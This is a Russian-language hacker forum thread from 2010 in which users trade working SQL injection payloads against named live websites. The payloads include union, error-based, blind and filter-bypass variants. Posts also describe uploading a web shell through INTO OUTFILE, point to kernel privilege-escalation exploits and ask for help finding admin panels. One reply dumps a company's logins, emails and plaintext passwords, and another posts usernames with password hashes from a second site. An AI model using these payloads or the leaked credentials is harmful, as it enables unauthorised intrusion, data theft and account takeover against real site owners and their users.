You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'+1 YEAR) AND upApproved = '1' LIMIT 1' at line 3
на тот же

Code:
script.php?Sex=female&YearFrom=18&YearTo=40') order by 1000--

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') order by 1000--+1 YEAR) AND upApproved = '1' LIMIT 1' at line 3
пробовал разные варианты и floor rand не пашет ((
PS.так как линк крупный не постил тут. Прошу помочь если у кого есть идеи




Code:
script.php?res=1&Sex=female&YearFrom=11+YEAR)+and+1=if(substring(version(),1,1 )=5,0,1)+--+

Derec
28.09.2010, 14:40
Друзья, по всей видимости есть уязвимость на одном сайте:

http://site.com/feedback/index/20'

при этом вижу ошибку:

A Database Error Occurred

Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27, 10' at line 6

SELECT * FROM (`guestbook`) WHERE `parent` = 0 AND `moderated` = 1 ORDER BY `id` DESC LIMIT 20%27, 10​

Первый раз столкнулся с таким типом sql-injection и тольком не получается ничего раскрутить. Как действовать в таком случае, подскажите?!

Expl0ited
28.09.2010, 15:09
Derec said:
Друзья, по всей видимости есть уязвимость на одном сайте:
http://site.com/feedback/index/20'
при этом вижу ошибку:
A Database Error Occurred
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27, 10' at line 6
SELECT * FROM (`guestbook`) WHERE `parent` = 0 AND `moderated` = 1 ORDER BY `id` DESC LIMIT 20%27, 10​
Первый раз столкнулся с таким типом sql-injection и тольком не получается ничего раскрутить. Как действовать в таком случае, подскажите?!


там фильтрация символов в движке, по этому ничего не выйдет.

Redwood
28.09.2010, 15:10
Derec said:
Друзья, по всей видимости есть уязвимость на одном сайте:
http://site.com/feedback/index/20'
при этом вижу ошибку:
A Database Error Occurred
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27, 10' at line 6
SELECT * FROM (`guestbook`) WHERE `parent` = 0 AND `moderated` = 1 ORDER BY `id` DESC LIMIT 20%27, 10​
Первый раз столкнулся с таким типом sql-injection и тольком не получается ничего раскрутить. Как действовать в таком случае, подскажите?!


Инъекция в лимите.

В данном случае инъекция не возможна из за присутствия order by.

Если нет order by, то крутиться, как обычно, через union select

Если позволяют условия, то попробуй сразу залить шелл:

1 limit 1 into outfile '/path/shell.php' lines terminated by "" --

1 limit 1 into outfile '/path/shell.php' fields terminated by '' optionally enclosed by "" --

durito
28.09.2010, 15:44
вот тоже интересный случай:

http://www.asiafuns.com/search_results.php?country=163+and+substring%28ver sion%28%29,1,1%29=5+--+ все нормуль

http://www.asiafuns.com/search_results.php?country=163+and+ascii%28substri ng%28%28select+column_name+from+information_schema .columns+limit+1,1%29,1,1%29%29%3E0+--+ редиректит на главную

тоже самое если пробовать union select

http://www.asiafuns.com/search_results.php?country=163+order+by+3+--+ норм

http://www.asiafuns.com/search_results.php?country=163+union+select+1,2,3+--+ редирект

попытки обхода с сменой регистра и добавлением комментариев /*!union+select*/ не проходит.

в какую сторону копать?

durito
28.09.2010, 16:09
http://www.asiafuns.com/search_results.php?country=163+and+substring%28SEL ECT%20version%28%29,1,1%29=5+--+

select не фильтруется

Derec
28.09.2010, 17:22
Redwood, я понял. С шеллом не получилось. Но вот, что известно:

Инъекция в числовом параметре есть:

http://site.com/menu/show/121%20and%201=1/33/#main

Результат:

A Database Error Occurred

Error Number: 1054

Unknown column '20and' in 'where clause'

SELECT * FROM menu WHERE id=121%20and%201=1​

Фильтруются пробелы, символы : ( , ) , /**/, +

Можно ли раскрутить скуль в таком случае?

Strilo4ka
28.09.2010, 19:46
подзапросы + join

Derec
28.09.2010, 19:51
Digger said:
пробуй POST'om


Это через программу? как бы я так понимаю я итак делаю post'om через браузер


Strilo4ka said:
подзапросы + join


подзапросы не помогают, потому что фильтруются даже скобочки в самой url

LBC
28.09.2010, 21:54
что делать если union и select в связке фильтруются

Redwood
28.09.2010, 22:09
LBC said:
что делать если union и select в связке фильтруются


Подзапросы, крутить как слепую, вывод в ошибке


Code:
sql.php?id=2+union+(select+1,2,table_name,4,5+from +information_schema.tables)

and etc


Code:
sql.php?id=2+and+(select+ascii(substring((select+t able_name+from+information_schema.tables+limit+0,1 ),1,1))+from+information_schema.tables+limit+0,1)>66

and etc

Вывод через ошибку без использования Union

Для Mysql 4.1>=


Code:
sql.php?id=2+and+(select+1+from+(select+count(*),c oncat((select+table_name+from+information_schema.t ables+limit+0,1),floor(rand(0)*2))+from+informatio n_schema.tables+group+by+2)a)



Code:
sql.php?id=2+or+1+group+by+concat((select+table_na me+from+information_schema.tables+limit+0,1),floor (rand(0)*2))+having+min(0)

Для Mysql 5.1>=


Code:
sql.php?id=2+and+extractvalue(1,concat(0x5c,((sele ct+table_name+from+information_schema.tables+limit +0,1))))

Для Mysql 5.0.12 > 5.0.64


Code:
sql.php?id=1+or+(1,2)=(select*from(select+name_con st((select+table_name+from+information_schema.tabl es+limit+0,1),1),name_const((select+table_name+fro m+information_schema.tables+limit+0,1),1))a)


Можно еще попробовать обойти так


Code:
sql.php?id=2+un/**/ion+se/**/lect+1,2,3,4,5



Code:
sql.php?id=2+un/*%00*/ion+se/*%00*/lect+1,2,3,4,5



Code:
sql.php?id=2/**/union/**/select/**/1,2,3,4,5



Code:
sql.php?id=2+union+%0A+select+1,2,3,4,5

Вариантов куча, всего не перечислишь, думаю этого должно хватить

-PRIVAT-
28.09.2010, 23:57
Кто знает софт(скрипт) который в гугл лезет по моему дорку, подставляет в URL ковычку и сайты где вышла ошибка передаёт мне?

Redwood
29.09.2010, 07:03
-PRIVAT- said:
Кто знает софт(скрипт) который в гугл лезет по моему дорку, подставляет в URL ковычку и сайты где вышла ошибка передаёт мне?


http://zalil.ru/29741714

cipa21
29.09.2010, 20:57
Нашел вот такую вещь


Code:
id=1+limit+1+into+outfile+'/path/to/shell.php'+fields+terminated+by+''+optionally+encl osed+by+""--+

Что-то я не пойму откуда берется шелл чтобы залить его в /path/to/ ?

brutos
29.09.2010, 21:00
cipa21 said:
Нашел вот такую вещь

Code:
id=1+limit+1+into+outfile+'/path/to/shell.php'+fields+terminated+by+''+optionally+encl osed+by+""--+

Что-то я не пойму откуда берется шелл чтобы залить его в /path/to/ ?


Так вот оно: ""

Можешь на свой код заменить...

Byrger
30.09.2010, 12:39
Привет подскажите плиз как оборвать запрос на данном сайте

http://allkupchino.ru/miss/miss.phtml?n=46{SQL}

http://allkupchino.ru/bbs/ob.phtml?nb=42{SQL}

Если подставить (+; --+; /*) то результат не выводится, значит ошибка = (

kfor
30.09.2010, 13:11
Byrger said:
Привет подскажите плиз как оборвать запрос на данном сайте
http://allkupchino.ru/miss/miss.phtml?n=46{SQL}
http://allkupchino.ru/bbs/ob.phtml?nb=42{SQL}
Если подставить (+; --+; /*) то результат не выводится, значит ошибка = (


По моему там ваапще нет скули..

SEWERN
30.09.2010, 13:27
Можно ли через sql inj внести изменения в колонку ДБ (допустим добавить/обновить юзера/хеш) ?

Если это возможно приведите плз пример

Gorev
30.09.2010, 13:31
SEWERN said:
Можно ли через sql inj внести изменения в колонку ДБ (допустим добавить/обновить юзера/хеш) ?
Если это возможно приведите плз пример



Нет нельзя.Подумай сам если бы такое было возможно, то раздел рашифровки хешей был бы не нужен.А если по теме то почитай доки мускуля а в частности UNION+SELECT

и UPDATE

-PRIVAT-
30.09.2010, 13:35
SEWERN said:
Можно ли через sql inj внести изменения в колонку ДБ (допустим добавить/обновить юзера/хеш) ?
Если это возможно приведите плз пример




PHP:
UPDATE admin SET email='admin@admin.ru'WHERE u ser_name='admin'

обновит емайл юзера под ником "admin" , вроде как. Но как подметил Gorev , чаще всего это невозможно... не хватает прав.

SEWERN
30.09.2010, 13:42
Читал доки , но как говорится надежда умирает последней )))

Спс.

jecka3000
30.09.2010, 13:46
очень прошу помочь найти админку тут zipp.com

Gorev
30.09.2010, 13:58
-PRIVAT- said:

PHP:
UPDATE admin SET email='admin@admin.ru'WHERE u ser_name='admin'

обновит емайл юзера под ником "admin" , вроде как. Но как подметил
Gorev
, чаще всего это невозможно... не хватает прав.


Это невозможно всегда, дело не в правах а в синтаксисе мускуля (если говорим про данный оператор в иньекции) UPDATE после UNION SELECT не работает.

Ericon2009
30.09.2010, 18:12
подскажите скриптец аналог bind.pl, но на пхп,

то есть цель - забиндить порт средствами пхп с целью туда неткатом подключиться

AC//DC
01.10.2010, 17:05
jecka3000 said:
очень прошу помочь найти админку тут zipp.com


http://zipp.com/media/

lukmus
01.10.2010, 20:55
/path/to/script?id=


Code:
if ($id){
#Fields that can be viewed only.
$sql = "SELECT p1.ex, p1.pre, p1.batch_no, p1.sh_country, ";
$sql .= "p1.sub, p1.ta, p1.t, p1.shg, p1.total, p1.totht, p1.passcode, ";
$sql .= "DATE_FORMAT(p1.date, '%M %D, %Y, %h:%i %p') AS date ";
$sql .= "FROM table1 p1, table2 p2 WHERE ";
$sql .= "p1.id = p2.id AND p1.id = '$id'";
$result = mysql_query($sql);
...

mysql 3. слепая. можно что-нить придумать чтобы вытащить все поля из table1 и table2? имена полей известны

-PRIVAT-
01.10.2010, 23:19
lukmus said:
/path/to/script?id=

Code:
if ($id){
#Fields that can be viewed only.
$sql = "SELECT p1.ex, p1.pre, p1.batch_no, p1.sh_country, ";
$sql .= "p1.sub, p1.ta, p1.t, p1.shg, p1.total, p1.totht, p1.passcode, ";
$sql .= "DATE_FORMAT(p1.date, '%M %D, %Y, %h:%i %p') AS date ";
$sql .= "FROM table1 p1, table2 p2 WHERE ";
$sql .= "p1.id = p2.id AND p1.id = '$id'";
$result = mysql_query($sql);
...

mysql 3. слепая. можно что-нить придумать чтобы вытащить все поля из table1 и table2? имена полей известны



PHP:
/path/to/script?id=1' or 1 group by concat(version(),f loor(rand(0)*2))having min(0) or 1--


только подзапросы поддерживаться не будут.

karencho777
01.10.2010, 23:24
люди можете помочь наити експлоит под апаче версии 1.3.36 спасибо

lukmus
02.10.2010, 02:08
-PRIVAT- said:

PHP:
/path/to/script?id=1' or 1 group by concat(version(),f loor(rand(0)*2))having min(0) or 1--

только подзапросы поддерживаться не будут.


я не очень понимаю твою мысль, как по твойму будет выглядеть запрос к БД и каким образом это обойдет ковычки?

по-мойму запрос будет такой:


Code:
SELECT bla,bla,bla FROM table1 p1, table2 p2 WHERE p1.id = p2.id AND p1.id = '1 or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1--'

и запрос ничего не вернет т.к. нет такого поле, где id равно строке '1 or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1--'

Redwood
02.10.2010, 03:10
Верный запрос:


Code:
1'+or+1+group+by+concat(version(),floor(rand(0)*2) )+having+min(0)+or+1 -- a

Но не в этом суть. В любом случае, не используя подзапросы, кроме как узнать версию и читать файлы на сервере, ничего сделать нельзя, так что, в данном случае, смысла в этом методе я не вижу.

Все поля из таблиц вытащить не удастся. Вытащить можно только те поля, которые участвуют в запросе, так как нельзя использовать объединение запросов через union.

Все что можно сделать это:


Code:
1'+and+ascii(substring(password,1,1))>66 -- a



Code:
1'+and+substring(password,1,1)='f' -- a

По тому куску кода, что ты выложил, что и как фильтруется сказать нельзя.

lukmus
02.10.2010, 03:24
Redwood said:
Верный запрос:

Code:
1'+or+1+group+by+concat(version(),floor(rand(0)*2) )+having+min(0)+or+1 -- a

Но не в этом не суть. В любом случае, не используя подзапросы, кроме как узнать версию и читать файлы на сервере, ничего сделать нельзя, так что, в данном случае, смысла в этом методе я не вижу.


я так не думаю т.к. уже вытащил пол таблицы методом слепой скули а-ля:


Code:
id=1+AND+128>ascii(mid(column,1,1))

фишка в том, как вы понимаете, что вытащить можно хоть все поля всех записей из нужной таблицы, если данный запрос уязвим.

Здесь вообще речь не об этом, а о том как обойти эти кавычки. Код скрипта обработчика я привел, но каким-то макаром если я подставляю ковычку в


Code:
script.php?id=1'

на странице все равно верный результат т.е. кавычка как-то фильтруется, так вот как она фильтруется и как это обойти?

KandidaT'S
02.10.2010, 12:27
http://www.basket-chel.ru/site/index/news/?id=167%27+and+1=0+UnIon+selECt+1,2,3,4,username,6 ,7,8,9,10+from+vbbusers+--+

чё не так делаю?

Gorev
02.10.2010, 12:47
KandidaT'S said:
http://www.basket-chel.ru/site/index/news/?id=167%27+and+1=0+UnIon+selECt+1,2,3,4,username,6 ,7,8,9,10+from+vbbusers+--+
чё не так делаю?



http://www.basket-chel.ru/site/index/news/?id=-167%27+union+select+1,2,3,4,5,6,7,8,9,10+from+vbb_ users--+

_ потерял...смотри внимательнее как табла называется

и с какого перепугу ты колонку тоже неправильно написал? версия 5 , выводи все правильно...

http://www.basket-chel.ru/site/index/news/?id=-167%27+union+select+1,2,name,pwd,5,6,7,8,9,10+from +vbb_users--+

M.W.N.N.
02.10.2010, 13:00
Тож смотрю на дамп и не вижу такой таблици. Вот если нужно дамп структуры - http://rghost.ru/2790176

KandidaT'S
02.10.2010, 13:35
a где там админка форума?)

ALIM
02.10.2010, 13:43
Помогите найти админку www.ealandmania.net

Gorev
02.10.2010, 13:50
KandidaT'S said:
a где там админка форума?)


а ты это форумом называешь?

KandidaT'S
02.10.2010, 13:52
=)

всё таки где админка ?

-PRIVAT-
02.10.2010, 13:58
ALIM said:
Помогите найти админку www.ealandmania.net


www.ealandmania.net/admin

www.ealandmania.net/controlpanel/

www.ealandmania.net/cpanel/

www.ealandmania.net/kpanel/

ALIM
02.10.2010, 17:18
-PRIVAT-

tnx

Помогите докрутить скулю, не могу подобрать кол-во колонок, пробывал ч-з blind не выходит

http://www.markus-schmitz.info/CoMaSys/index.php?SID=owbmptuuq&action=cms&id=5%20order%20by%203%20--

Gedj
02.10.2010, 17:20
ALIM said:
-PRIVAT-
tnx
Помогите докрутить скулю, не могу подобрать кол-во колонок, пробывал ч-з blind не выходит
http://www.markus-schmitz.info/CoMaSys/index.php?SID=owbmptuuq&action=cms&id=5%20order%20by%203%20--




Code:
http://www.markus-schmitz.info/CoMaSys/index.php?SID=owbmptuuq&action=cms&id=5+and+row(1,2)in(select+count(*),concat((select +table_name+from+information_schema.tables+limit+0 ,1),0x3a,floor(rand(0)*2))as+a+from+information_sc hema.tables+x+group+by+a)

Дальше лимитом перебирай

ubi
02.10.2010, 17:34
ребят нужна помощь, не могу найти админку


Code:
http://www.shalomtv.tv

в ПМ пожалуйста

AttackPro
02.10.2010, 21:27
помогите найти логины и пароли сайта kitcom.ru

SQL inj:

http://www.kitcom.ru/goods/index.php?gm=-138+union+select+1,2,database()

tracy
02.10.2010, 21:43
AttackPro said:
помогите найти логины и пароли сайта kitcom.ru
SQL inj:
http://www.kitcom.ru/goods/index.php?gm=-138+union+select+1,2,database()


http://www.kitcom.ru/goods/index.php?gm=-138+union+select+1,2,version()+--+

В 4.1.21 нету information_schema , значит не получится вывести таблицу с аккаунтами ...

Как выриант брутить таблицы

http://www.kitcom.ru/goods/index.php?gm=-138+union+select+1,2,concat_ws(0x3a,login,pwd)+fro m+users+--+

Подабрал users,accounts - дальше сам пробуй )

AttackPro
02.10.2010, 21:52
спасибо

AttackPro
02.10.2010, 21:52
а админку?

kitcom.ru/admin

AttackPro
02.10.2010, 21:54
нашел

http://www.kitcom.ru/goods/index.php?gm=-138+union+select+1,2,name+from+groups

swat_
02.10.2010, 21:55
AttackPro said:
помогите найти логины и пароли сайта kitcom.ru
SQL inj:
http://www.kitcom.ru/goods/index.php?gm=-138+union+select+1,2,database()


держи


PHP:
login email pwd

aav vml@kitcom.ru tirthadas

admin glebov@kitcom.ru flvby1

bea support@kitcom.ru cosys976

biv ivan flvby2_

glbuh kvi@kitcom.ru flvby2_3

gvv svg@kitcom.ru flvby3_3

ivan biv@kitcom.ru flvby_3

ivan@kitco kvp1@kitcom.ru flvby4 2_

kel mobil@kitcom.ru fsota2_

KNN glbuh@kitcom.ru lvvy42_

kvi ivan@kitcom.ru flvby2_

kvp1 sna@kitcom.ru job04

KVV nshr nshr1_

Ljcneg support@kitcom.ru Pfrfhsn

news sps@kitcom.ru yjDsq2_

nshr kel@kitcom.ru TotKjby_

sna gsa@kitcom.ru news_

sps bea@kitcom.ru job1104

svg tea@kitcom.ru dynax19xxx

tea knn@kitcom.ru KNN

vml kv@kitcom.ru KVV

AttackPro
02.10.2010, 22:04
огромное спасибо

--------------

ток при входе пишет что неправильные данные

swat_
02.10.2010, 22:05
дал всё что было

AttackPro
02.10.2010, 22:06
ладно спасибо мне просто интересно

AC//DC
03.10.2010, 12:13
помогите найти админку

http://www.karat-telecom.ru/

Gedj
03.10.2010, 12:58
AC//DC said:
помогите найти админку
http://www.karat-telecom.ru/


http://www.karat-telecom.ru/Album/login.php

http://www.karat-telecom.ru/Album/admin.php - У Вас нет прав для просмотра этой страницы.

The Elusive
03.10.2010, 14:48
ALIM said:
-PRIVAT-
tnx
Помогите докрутить скулю, не могу подобрать кол-во колонок, пробывал ч-з blind не выходит
http://www.markus-schmitz.info/CoMaSys/index.php?SID=owbmptuuq&action=cms&id=5%20order%20by%203%20--


Думаю ты искал это =)


Code:
username password
azrael 50ec504080ee3b965271235bf7789946
fies 5452eea2e1ff9cefa25f5fb590386dfb
muster 96f570c3c87558604e79f35637b4663c
test 098f6bcd4621d373cade4e832627b4f6

pinch
04.10.2010, 00:16
http://www.markus-schmitz.info/CoMaSys/index.php?SID=owbmptuuq&action=cms&id=5+and+%28select+1+from+%28select+count%280%29,c oncat%28%28select+table_name+from+information_sche ma.tables+limit+0,1%29,floor%28rand%280%29*2%29%29 +from+information_schema.tables+group+by+2%29a%29--

дальше сам крути...

moby.exe
04.10.2010, 00:39
На сайте в комментах знаки


Code:


преобразуются в


Code:
&lt; &gt;

и выводятся обычным текстом. Это можно как-нибудь обойти?

The Elusive
04.10.2010, 07:10
moby.exe said:
На сайте в комментах знаки

Code:


преобразуются в

Code:
&lt; &gt;

и выводятся обычным текстом. Это можно как-нибудь обойти?


Можно закодировать так.


Code:
%3C%20%3E

URL

[CODE]
Code:

rooopster
04.10.2010, 15:50
Где сохраняются аватары в phpBB? Есть ЛФИ и полный путь к сайту, пробую подгрузить в аватаре в метаданных пхп код, но выводится она похоже через скрипт, неужели прямо в бд сохраняются аватары? Если так, то как еще можно загрузить шелл? Спасибо

boxazbox
04.10.2010, 16:29
officepro.am


pomoqite nayti adminku..

-PRIVAT-
04.10.2010, 16:37
boxazbox said:
pomoqite nayti adminku..


officepro.am/controlpanel/

officepro.am/cpanel/

officepro.am/kpanel/

stepashka_
04.10.2010, 16:58
Помогите найти сплоит под ядро


$ uname -a
Linux ptzhost.com 2.6.26-bpo.1-amd64 #1 SMP Thu Mar 26 23:14:12 UTC 2009 x86_64 GNU/Linux

boxazbox
04.10.2010, 18:17
http://l0calr00t.hackerzhub.net/2.6.r1z/
http://l0calr00t.hackerzhub.net/2010/
http://l0calr00t.hackerzhub.net/Best%20Local/Locals/


probuy/

mailbrush
04.10.2010, 19:25
stepashka_ said:
Помогите найти сплоит под ядро


sock_sendpage() должен сработать...

asia555
05.10.2010, 06:01
Возможно ли проведение sql-инъекции?

$query = 'SELECT nickname FROM users WHERE username ="' . htmlentities($_GET["username"],ENT_QUOTES, 'UTF-8') . '"';

Спасибо

Redwood
05.10.2010, 06:38
asia555 said:
Возможно ли проведение sql-инъекции?
$query = 'SELECT nickname FROM users WHERE username ="' . htmlentities($_GET["username"],ENT_QUOTES, 'UTF-8') . '"';
Спасибо


Невозможно.

pinch
05.10.2010, 21:11
хэлп помогтие раскрутить

http://www.sun-e-shop.co.za/?Task=CompanyInfo&CategoryID=3777'

http://www.ncm.org.uk/news.asp?id=1'

http://www.yakutproekt.ru/news.php?id=14517'

http://www.lpem.org/index.php?mn=6&sb=9&id=9'&act=detail

Konqi
05.10.2010, 21:14
http://www.ncm.org.uk/news.asp?id=1+and+1=(select+top+1+table_name+from+ information_schema.tables)

дальше сам

-PRIVAT-
05.10.2010, 21:19
pinch said:
хэлп помогтие раскрутить
http://www.lpem.org/index.php?mn=6&sb=9&id=9'&act=detail


http://www.lpem.org/index.php?mn=6&sb=9&id=9%20or%201%20group%20by%20concat(version(),floo r(rand(0)*2))having%20min(0)%20or%201--%201&act=detail

Если не знаешь как дальше, то пиши в ПМ

Konqi
05.10.2010, 21:20
-PRIVAT- said:
http://www.lpem.org/index.php?mn=6&sb=9&id=9%20or%201%20group%20by%20concat(version(),floo r(rand(0)*2))having%20min(0)%20or%201--%201&act=detail
Если не знаешь как дальше, то пиши в ПМ


http://www.lpem.org/index.php?mn=6&sb=9&id=9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19--&act=detail

mm?

-PRIVAT-
05.10.2010, 21:21
Konqi said:
http://www.lpem.org/index.php?mn=6&sb=9&id=9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19--&act=detail
mm?


мм... можно и так

pinch
05.10.2010, 21:22
чуваки в том то и дело что FROM никак не вставишь=((

хотел станд. методом

так уж быть

http://www.lpem.org/index.php?mn=6&sb=9&id=9+and+%28select+1+from+%28select+count%280%29,c oncat%28%28select+version%28%29%29,floor%28rand%28 0%29*2%29%29+from+information_schema.tables+group+ by+2%29a%29--&act=detail

Duplicate entry '5.1.50-log1' for key 'group_key'

pinch
05.10.2010, 21:26
http://www.yakutproekt.ru/news.php?id=14517'

вот это надо ....

Konqi
05.10.2010, 21:30
pinch said:
http://www.yakutproekt.ru/news.php?id=14517'
вот это надо ....


тут точно не мускул, думаю ms_sql, но не скажу почему )

21 столбцов но селект не робит.

если есть желание копай дальше

R1dex
05.10.2010, 21:36
ну да, mssql

http://www.yakutproekt.ru/news.php?id=14517+and+len(@@version)=len(@@version )

4-ый сайт вообще не открывается без ошибки..

GroM88
06.10.2010, 03:04
Выдрал лоигины и пассы админов на отдном сайте...

Попал в админку) в админке написанно Extasy CMS for site.ru

Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос

и доступен html

мб как то можно залить шел с помощью sql запроса?

d1v
06.10.2010, 03:57
GroM88 said:
мб как то можно залить шел с помощью sql запроса?


для этого ты должен иметь права на запись и знать локальный путь до сайта.

чтобы узнать есть ли права, используй запрос

UNION SELECT File_Priv from mysql.user

если в ответ получишь Y, то права есть.

чтобы найти путь, попытайся вывести какую-нибудь ошибку, например через тот же sql запрос. или просмотри базу на наличие каких-нибудь конфигов. в них может быть указан путь.

если права будут (в чём я сомневаюсь), и узнаешь путь, используй след. запрос для залития шелла:

UNION SELECT 'шелл' from mysql.user into outfile 'путь_до_сайта/shell.php'

shell_c0de
06.10.2010, 06:47
GroM88 said:
Выдрал лоигины и пассы админов на отдном сайте...
Попал в админку) в админке написанно Extasy CMS for site.ru
Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос
и доступен html
мб как то можно залить шел с помощью sql запроса?


кроме совета d1v попробуй эти логины пароли к mail/pma/ssh/ftp/cpanel/etc...

shell_c0de
06.10.2010, 07:09
pinch said:
http://www.yakutproekt.ru/news.php?id=14517'
вот это надо ....


БД


master
tempdb
model
msdb
telecom
zaokolmi
zags
р–master


Таблы с БД zaokolmi


dtproperties
foto_catalog
auto_catalog
admin


pwd name

009091b3166dcbe1aa6202a97bcda08a zao

пароль от хеша 123456 вроде

Сайты на сервере(ReverseIP): больше 50

кстати там можно и rdp поднять если прав хватит... завтра поковыряюсь.

pinch
06.10.2010, 09:26
shell_code плиииз запросы в личку

swat_
06.10.2010, 18:48
GroM88 said:
Выдрал лоигины и пассы админов на отдном сайте...
Попал в админку) в админке написанно Extasy CMS for site.ru
Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос
и доступен html
мб как то можно залить шел с помощью sql запроса?



site?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php' --

Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php.

и да Требуются привилегии FILE

tracy
06.10.2010, 19:35
GroM88 said:
Выдрал лоигины и пассы админов на отдном сайте...
Попал в админку) в админке написанно Extasy CMS for site.ru
Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос
и доступен html
мб как то можно залить шел с помощью sql запроса?


Почитай (Заливка шелла через MYSQL) (https://rdot.org/forum/showthread.php?t=352)

shell_c0de
06.10.2010, 20:45
а d1v что написал то ? =\

nemans
07.10.2010, 02:42
Подскажите программку сканирования и сохранения заданного диапазона интернет странц на сайте, например есть сайт http://site.com?112 и http://site.com?5000 можно ли отсканировать заданный диапазон с записью результатов, ссори если наивный вопрос.

AdDa
07.10.2010, 03:07
Что в вашем понимании "отсканировать"? Вообще скрипт нужно сделать (мне по душе перл).

high_rez
07.10.2010, 10:51
Ужасно глупый вопрос.

Если я пытаюсь найти XSS и вдруг мой браузер говорит мне, что обнаружена попытка проведения XSS атаки, это значит, что я все таки нашел что то и мой браузер это заблокировал и выдал сообщение?

В моем браузере отключены скритпы.